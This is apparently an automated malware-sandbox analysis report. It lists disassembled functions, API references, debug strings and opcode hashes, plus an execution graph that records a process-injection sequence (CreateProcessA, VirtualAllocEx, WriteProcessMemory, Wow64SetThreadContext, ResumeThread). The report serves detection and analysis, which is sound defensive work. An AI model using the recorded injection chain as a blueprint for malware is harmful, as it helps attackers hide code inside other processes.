                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 943b14defb7ee51fa2ed6b119df21b35b1ca53e390b3789177453562268dd1aa
                                                                                    • Instruction ID: 45914ea70b3be3b7792cf5b539a0809bdfb5badec5f98316533866b0160b5ab6
                                                                                    • Opcode Fuzzy Hash: 943b14defb7ee51fa2ed6b119df21b35b1ca53e390b3789177453562268dd1aa
                                                                                    • Instruction Fuzzy Hash: CC90026170140407E102719844246060009D7D2346FD5C012E3428555DC6259B57A233
                                                                                    Function 01893090 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: dc97bdeb064d162ee5832a1f485278e0e8422d5d0c5946f21ee7ea1d434f8154
                                                                                    • Instruction ID: 11f847d52906628e1c20e610df553ad8d427c9c2956dbe963d98af507769a346
                                                                                    • Opcode Fuzzy Hash: dc97bdeb064d162ee5832a1f485278e0e8422d5d0c5946f21ee7ea1d434f8154
                                                                                    • Instruction Fuzzy Hash: 0490026174140807E140719884247070006D7D1702F95C011A2028554DC6169B6967B2
                                                                                    Function 01893010 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 30b47b0c8d07cc9e4dbcd334fa9a9593008ff48db3f662233373fcb88a32245b
                                                                                    • Instruction ID: 314d452b1d493f99001ad6c028d597fe27681615ee76749bb1bda35a2f995e7a
                                                                                    • Opcode Fuzzy Hash: 30b47b0c8d07cc9e4dbcd334fa9a9593008ff48db3f662233373fcb88a32245b
                                                                                    • Instruction Fuzzy Hash: FB90026170184447E14072984814B0F410597E2303FD5C019A615A554CC9159A595732
                                                                                    Function 018939B0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 42abe4b1768c117c7858505c05ff3929023012d18ab3cc638df7c21aa8f0bb57
                                                                                    • Instruction ID: 3339dc2e5b4cbba3bfd4d52f58b178b57ab2e5f7915addd00cd9b84d7ffac29e
                                                                                    • Opcode Fuzzy Hash: 42abe4b1768c117c7858505c05ff3929023012d18ab3cc638df7c21aa8f0bb57
                                                                                    • Instruction Fuzzy Hash: DA90026174545107E150719C44146164005B7E1302F95C021A2818594DC5559A596332
                                                                                    Function 01893D10 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7b6eac02cf1828035d8454e2be33087a1865fdd2dfc1cd5a5f09971ba89f0bc5
                                                                                    • Instruction ID: 0abcea5a499945d62778eba0788bc4c726b7a0f4e8ef4cf77bfbb034f969d4c3
                                                                                    • Opcode Fuzzy Hash: 7b6eac02cf1828035d8454e2be33087a1865fdd2dfc1cd5a5f09971ba89f0bc5
                                                                                    • Instruction Fuzzy Hash: 0190027170240147A54072985814A4E410597E2303BD5D415A2019554CC9149A655332
                                                                                    Function 01893D70 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8ae9f029575d361ee4778b96a7f5effb5089f8ca62114c671f19dd7819bd66e4
                                                                                    • Instruction ID: c3be5b6c9c49df2194e71b8a3ab3567c9ea05834f99381ccab9fd360e2642f7c
                                                                                    • Opcode Fuzzy Hash: 8ae9f029575d361ee4778b96a7f5effb5089f8ca62114c671f19dd7819bd66e4
                                                                                    • Instruction Fuzzy Hash: 6090027570140407E51071985814646004697D1302F95D411A2428558DC6549AA5A232
                                                                                    Function 01892C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                    • Instruction ID: b40723a53c878674e63a14f65542ca1db8a50b58ba9d29032841b104a2c1fdcc
                                                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                    • Instruction Fuzzy Hash:
                                                                                    Function 01892890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                    • API String ID: 48624451-2108815105
                                                                                    • Opcode ID: 7fd046a8551995ede277d80e413de8e014e25060c3597d9d4cb32f25eb35b735
                                                                                    • Instruction ID: 4784d5be2d3de751a9f6930b014048ca4f381f420120d879f32b072c63fba797
                                                                                    • Opcode Fuzzy Hash: 7fd046a8551995ede277d80e413de8e014e25060c3597d9d4cb32f25eb35b735
                                                                                    • Instruction Fuzzy Hash: 8951D3A6A0011ABFDF15DB9C889097EFBB9BB58340758C229F4A5E7641E334DF4087A0
                                                                                    Function 01902410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                    • API String ID: 48624451-2108815105
                                                                                    • Opcode ID: 4afa1aa6f718db8fe380e753e9360144ca8899cb66894698cfeab52fb253cdbb
                                                                                    • Instruction ID: cf9a4c4968fbf85399f0d3820b6218e86ffe4ebaaa3f76040506277582e38c42
                                                                                    • Opcode Fuzzy Hash: 4afa1aa6f718db8fe380e753e9360144ca8899cb66894698cfeab52fb253cdbb
                                                                                    • Instruction Fuzzy Hash: 57510671A00646AFDB32DF5CC89487EBBFCEF48201B44886AF5DAD7681DA74DA008760
                                                                                    Function 01887630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 018C4787
                                                                                    • Execute=1, xrefs: 018C4713
                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 018C4655
                                                                                    • ExecuteOptions, xrefs: 018C46A0
                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 018C4725
                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018C46FC
                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 018C4742
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                    • API String ID: 0-484625025
                                                                                    • Opcode ID: 20dfce7f704ac81b56891871020505e1b73444fc2f252ff4c96a6b8bfae80844
                                                                                    • Instruction ID: e61b036f450a6fda57d3d059d08faea42df97356d9ea389e1a7a8000a32c1919
                                                                                    • Opcode Fuzzy Hash: 20dfce7f704ac81b56891871020505e1b73444fc2f252ff4c96a6b8bfae80844
                                                                                    • Instruction Fuzzy Hash: 4C51283160021D7AEF21FBA8DC99FAD77B8EF54708F2800A9D605E7281E7709B45CB51
                                                                                    Function 0189B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldvrm
                                                                                    • String ID: +$-$0$0
                                                                                    • API String ID: 1302938615-699404926
                                                                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                    • Instruction ID: 8ac9f5be2c3db8f5fadc1d5114b6e3bd1b7c5500a6fae95f412160ac80c125b2
                                                                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                    • Instruction Fuzzy Hash: 5381B170E15249AFEF258E6CE891FFEBBB1AF45360F1C4219E851E7291C7349A40CB91
                                                                                    Function 0187F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018C02E7
                                                                                    • RTL: Re-Waiting, xrefs: 018C031E
                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018C02BD
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                    • API String ID: 0-2474120054
                                                                                    • Opcode ID: e833c938c00238a3843f37e09d9301e041235105fbef73703cd66163528f59a4
                                                                                    • Instruction ID: da79d4c2961e4f1b95dc20734930dc5cb4c58cee5542789fc7de8fdd598c092b
                                                                                    • Opcode Fuzzy Hash: e833c938c00238a3843f37e09d9301e041235105fbef73703cd66163528f59a4
                                                                                    • Instruction Fuzzy Hash: 52E19B34608742DFE725CF2DC884B2ABBE1AB84758F140A1DF6A5CB2E1D774DA45CB42
                                                                                    Function 0188BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • RTL: Re-Waiting, xrefs: 018C7BAC
                                                                                    • RTL: Resource at %p, xrefs: 018C7B8E
                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 018C7B7F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                    • API String ID: 0-871070163
                                                                                    • Opcode ID: 61922b7642a75bfb81db73f516de70b6fce0eef1e7f1f5551cc32c67835f1871
                                                                                    • Instruction ID: 4ca74c3b2e94c87240d2f61b21a52bde5acd3dc4dd1a2658fac68f0cbd60e3d5
                                                                                    • Opcode Fuzzy Hash: 61922b7642a75bfb81db73f516de70b6fce0eef1e7f1f5551cc32c67835f1871
                                                                                    • Instruction Fuzzy Hash: 2941D2357007029FD725EE29C840B6AB7E5EF99710F100A1DFA5ADB680DB71EA058F92
                                                                                    Function 0188B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018C728C
                                                                                    Strings
                                                                                    • RTL: Re-Waiting, xrefs: 018C72C1
                                                                                    • RTL: Resource at %p, xrefs: 018C72A3
                                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 018C7294
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                    • API String ID: 885266447-605551621
                                                                                    • Opcode ID: 31a641eb8decb42d4337da3dfec741d19c2b04fcf034498b6d2a5bafb501e4a4
                                                                                    • Instruction ID: 84b493ff4b4fd84788d3465183c7c7a31ad9a4c425d3f81b8da31b07e9a02744
                                                                                    • Opcode Fuzzy Hash: 31a641eb8decb42d4337da3dfec741d19c2b04fcf034498b6d2a5bafb501e4a4
                                                                                    • Instruction Fuzzy Hash: 7D410231700606ABD721DE29CC81F6AB7A6FF94B14F14061DF956EB241DB31EA428BD1
                                                                                    Function 01902300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: %%%u$]:%u
                                                                                    • API String ID: 48624451-3050659472
                                                                                    • Opcode ID: 14252e3c65925e801afffd1fef47fbbdeda6f833936a53c6fdfc3114de31d9c5
                                                                                    • Instruction ID: 69ed65afde9407a383393d22421222467bb0636f2cf4202f7c11f006536dd52f
                                                                                    • Opcode Fuzzy Hash: 14252e3c65925e801afffd1fef47fbbdeda6f833936a53c6fdfc3114de31d9c5
                                                                                    • Instruction Fuzzy Hash: 0C316672A002199FDB21DF2DCC44BEEB7FCEB54B11F444555E94DE3280EB309A458BA1
                                                                                    Function 01897D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldvrm
                                                                                    • String ID: +$-
                                                                                    • API String ID: 1302938615-2137968064
                                                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                    • Instruction ID: 5911b871a9555b0857852b0e9e8eb5a729f1f0369b565c0b47224d6ce781ac14
                                                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                    • Instruction Fuzzy Hash: 3C919F71E1021A9EEF24DF6DC881ABEBBA5AF85720F1C451AE955E72C0E7309B408F51
                                                                                    Function 01859126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $$@
                                                                                    • API String ID: 0-1194432280
                                                                                    • Opcode ID: cbfaa1af23fc5ae8dc816f3708ba0141e462001f66c7d73263474ba7c268411e
                                                                                    • Instruction ID: 78ffc0a5a2700cc877309ef1b945367e2f0df36a290295b8f5e4f0827d396b8c
                                                                                    • Opcode Fuzzy Hash: cbfaa1af23fc5ae8dc816f3708ba0141e462001f66c7d73263474ba7c268411e
                                                                                    • Instruction Fuzzy Hash: 5E811AB5D002699BDB618B58CC44BEABBB8AB09754F0041DAEA19F7240D7309F84CFA1

                                                                                    Execution Graph

                                                                                    Execution Coverage:7.3%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:71
                                                                                    Total number of Limit Nodes:9
                                                                                    execution_graph 33221 6c1fcc0 33222 6c1fcd5 33221->33222 33225 6c1ccc0 33222->33225 33226 6c1cd00 VirtualAllocEx 33225->33226 33228 6c1cd3d 33226->33228 33256 6c1ce70 33257 6c1cebb ReadProcessMemory 33256->33257 33259 6c1ceff 33257->33259 33260 6c1cd80 33261 6c1cdc8 WriteProcessMemory 33260->33261 33263 6c1ce1f 33261->33263 33229 5246da0 33231 5246da4 33229->33231 33230 5246dd6 33231->33230 33234 5244b5c 33231->33234 33233 5246e41 33236 5244b67 33234->33236 33235 5248349 33235->33233 33236->33235 33240 5248e08 33236->33240 33243 5248e18 33236->33243 33237 524845c 33237->33233 33246 524790c 33240->33246 33244 5248e35 33243->33244 33245 524790c DrawTextExW 33243->33245 33244->33237 33245->33244 33247 5248e50 DrawTextExW 33246->33247 33249 5248e35 33247->33249 33249->33237 33250 b6d3a0 DuplicateHandle 33251 b6d436 33250->33251 33252 6c1cbe8 33253 6c1cc2d Wow64SetThreadContext 33252->33253 33255 6c1cc75 33253->33255 33264 6c1d008 33265 6c1d091 CreateProcessA 33264->33265 33267 6c1d253 33265->33267 33312 6c1cb38 33313 6c1cb78 ResumeThread 33312->33313 33315 6c1cba9 33313->33315 33268 b64668 33269 b64672 33268->33269 33271 b64758 33268->33271 33272 b6475d 33271->33272 33276 b64867 33272->33276 33280 b64868 33272->33280 33277 b6488f 33276->33277 33279 b6496c 33277->33279 33284 b6449c 33277->33284 33282 b6488f 33280->33282 33281 b6496c 33281->33281 33282->33281 33283 b6449c CreateActCtxA 33282->33283 33283->33281 33285 b658f8 CreateActCtxA 33284->33285 33287 b659bb 33285->33287 33288 b6add8 33292 b6aed0 33288->33292 33297 b6aebf 33288->33297 33289 b6ade7 33293 b6af04 33292->33293 33294 b6aee1 33292->33294 33293->33289 33294->33293 33295 b6b108 GetModuleHandleW 33294->33295 33296 b6b135 33295->33296 33296->33289 33298 b6af04 33297->33298 33299 b6aee1 33297->33299 33298->33289 33299->33298 33300 b6b108 GetModuleHandleW 33299->33300 33301 b6b135 33300->33301 33301->33289 33302 b6d158 33303 b6d19e GetCurrentProcess 33302->33303 33305 b6d1f0 GetCurrentThread 33303->33305 33308 b6d1e9 33303->33308 33306 b6d226 33305->33306 33307 b6d22d GetCurrentProcess 33305->33307 33306->33307 33309 b6d263 GetCurrentThreadId 33307->33309 33308->33305 33311 b6d2bc 33309->33311

                                                                                    Executed Functions

                                                                                    Function 0B41035A Relevance: .3, Instructions: 347COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1417791958.000000000B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B410000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_b410000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 28dfe0454e9a1a8b4d753fc1ee32c6357c1cfe1b994e66e705baf40e53a19e12
                                                                                    • Instruction ID: 5f813f6c4bbccd72df35aa0002d7c995f19a3a34416a544fb42cff711077d3ae
                                                                                    • Opcode Fuzzy Hash: 28dfe0454e9a1a8b4d753fc1ee32c6357c1cfe1b994e66e705baf40e53a19e12
                                                                                    • Instruction Fuzzy Hash: D7D18A71B016008FDB25DB75C85076B77F6AF8A700F1448AAE15A9B391DF38EA42CB61
                                                                                    Function 00B6D158 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32 ref: 00B6D1D6
                                                                                    • GetCurrentThread.KERNEL32 ref: 00B6D213
                                                                                    • GetCurrentProcess.KERNEL32 ref: 00B6D250
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00B6D2A9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1406542811.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_b60000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: Current$ProcessThread
                                                                                    • String ID:
                                                                                    • API String ID: 2063062207-0
                                                                                    • Opcode ID: f07fd3a9d950cbdabd1364ba40f65db5ad50528e9c336c8d4c0a728f81d185cc
                                                                                    • Instruction ID: a8c3a96d9f46dd7503e34ae84d936b81af00e71131c48a104d8d184ff8d3da47
                                                                                    • Opcode Fuzzy Hash: f07fd3a9d950cbdabd1364ba40f65db5ad50528e9c336c8d4c0a728f81d185cc
                                                                                    • Instruction Fuzzy Hash: 0B5158B4E003098FEB14DFAAD548B9EBBF1FF88314F208459E419A7350D779A944CB65
                                                                                    Function 06C1D008 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 92 6c1d008-6c1d09d 94 6c1d0d6-6c1d0f6 92->94 95 6c1d09f-6c1d0a9 92->95 102 6c1d0f8-6c1d102 94->102 103 6c1d12f-6c1d15e 94->103 95->94 96 6c1d0ab-6c1d0ad 95->96 97 6c1d0d0-6c1d0d3 96->97 98 6c1d0af-6c1d0b9 96->98 97->94 100 6c1d0bb 98->100 101 6c1d0bd-6c1d0cc 98->101 100->101 101->101 104 6c1d0ce 101->104 102->103 105 6c1d104-6c1d106 102->105 109 6c1d160-6c1d16a 103->109 110 6c1d197-6c1d251 CreateProcessA 103->110 104->97 107 6c1d129-6c1d12c 105->107 108 6c1d108-6c1d112 105->108 107->103 111 6c1d114 108->111 112 6c1d116-6c1d125 108->112 109->110 114 6c1d16c-6c1d16e 109->114 123 6c1d253-6c1d259 110->123 124 6c1d25a-6c1d2e0 110->124 111->112 112->112 113 6c1d127 112->113 113->107 115 6c1d191-6c1d194 114->115 116 6c1d170-6c1d17a 114->116 115->110 118 6c1d17c 116->118 119 6c1d17e-6c1d18d 116->119 118->119 119->119 121 6c1d18f 119->121 121->115 123->124 134 6c1d2f0-6c1d2f4 124->134 135 6c1d2e2-6c1d2e6 124->135 137 6c1d304-6c1d308 134->137 138 6c1d2f6-6c1d2fa 134->138 135->134 136 6c1d2e8 135->136 136->134 140 6c1d318-6c1d31c 137->140 141 6c1d30a-6c1d30e 137->141 138->137 139 6c1d2fc 138->139 139->137 142 6c1d32e-6c1d335 140->142 143 6c1d31e-6c1d324 140->143 141->140 144 6c1d310 141->144 145 6c1d337-6c1d346 142->145 146 6c1d34c 142->146 143->142 144->140 145->146
                                                                                    APIs
                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06C1D23E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1416081126.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_6c10000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcess
                                                                                    • String ID:
                                                                                    • API String ID: 963392458-0
                                                                                    • Opcode ID: d43bb598868271dbdd9af87c05b2f71407836c8ff9cfd1f99242751b83501d00
                                                                                    • Instruction ID: 8b996fc6e2ed75e583817be45f7ce5a7e13b7210217f770bc849608808d795f4
                                                                                    • Opcode Fuzzy Hash: d43bb598868271dbdd9af87c05b2f71407836c8ff9cfd1f99242751b83501d00
                                                                                    • Instruction Fuzzy Hash: 3E915A71D002198FEB64CF69C841BDEBBF2BF49310F148569E819AB240DB74AA85DF91
                                                                                    Function 00B6AED0 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 148 b6aed0-b6aedf 149 b6aee1-b6aeee call b698d8 148->149 150 b6af0b-b6af0f 148->150 157 b6af04 149->157 158 b6aef0-b6aefe call b6b168 149->158 151 b6af23-b6af64 150->151 152 b6af11-b6af1b 150->152 159 b6af66-b6af6e 151->159 160 b6af71-b6af7f 151->160 152->151 157->150 158->157 167 b6b040-b6b100 158->167 159->160 161 b6afa3-b6afa5 160->161 162 b6af81-b6af86 160->162 166 b6afa8-b6afaf 161->166 164 b6af91 162->164 165 b6af88-b6af8f call b6a8b4 162->165 169 b6af93-b6afa1 164->169 165->169 170 b6afb1-b6afb9 166->170 171 b6afbc-b6afc3 166->171 198 b6b102-b6b105 167->198 199 b6b108-b6b133 GetModuleHandleW 167->199 169->166 170->171 172 b6afc5-b6afcd 171->172 173 b6afd0-b6afd9 call b6a8c4 171->173 172->173 179 b6afe6-b6afeb 173->179 180 b6afdb-b6afe3 173->180 181 b6afed-b6aff4 179->181 182 b6b009-b6b016 179->182 180->179 181->182 184 b6aff6-b6b006 call b6a8d4 call b6a8e4 181->184 188 b6b018-b6b036 182->188 189 b6b039-b6b03f 182->189 184->182 188->189 198->199 200 b6b135-b6b13b 199->200 201 b6b13c-b6b150 199->201 200->201
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00B6B126
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1406542811.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_b60000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    • Opcode ID: fcbc0bd74b2c67dfdc65158d3a2426933b7589bd485d621122c809d853aaf898
                                                                                    • Instruction ID: ba0cb0df4324f49275a827de7839fe7845f12926399754c39eae4c60a45ffd14
                                                                                    • Opcode Fuzzy Hash: fcbc0bd74b2c67dfdc65158d3a2426933b7589bd485d621122c809d853aaf898
